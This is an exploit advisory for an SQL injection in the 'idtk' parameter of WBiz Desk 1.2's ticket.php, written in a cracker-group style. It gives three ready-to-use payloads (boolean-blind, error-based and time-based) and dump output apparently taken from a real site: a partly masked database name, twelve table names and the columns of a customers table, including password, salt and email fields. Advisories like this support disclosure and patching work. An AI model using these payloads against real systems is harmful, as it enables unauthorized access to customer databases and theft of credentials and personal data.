Headline
WBiz Desk 1.2 SQL Injection
WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://www.codester.com/items/5641/ ││ Vendor : WeBiz Digital ││ Software : WBiz Desk 1.2 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phphttp://website/ticket.php?tk=1&idtk=[SQLi]&action=closeGET parameter 'idtk' is vulnerable to SQL Injection---Parameter: idtk (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close---[+] Starting the Attackfetching current databasecurrent database: 'wbizdesk_*****_com_br'fetching tables[12 tables]+----------------+| accounts || category || chat || config || customers || departments || email_template || log_tb || messages || tickets || tutorial || users |+----------------+fetching columns for table 'customers'[19 columns]+--------------+-------------------+| Column | Type |+--------------+-------------------+| name | varchar(160) || number | varchar(11) || status | enum('S','B','N') || address | varchar(255) || city | varchar(160) || company | varchar(160) || country | varchar(60) || cpf_cnpj | varchar(60) || email | varchar(255) || id | int(11) || ip | varchar(90) || neighborhood | varchar(160) || obs | text || os | varchar(160) || pass | varchar(160) || phrase | varchar(160) || salt | varchar(255) || state | varchar(160) || zipcode | varchar(60) |+--------------+-------------------+[-] Done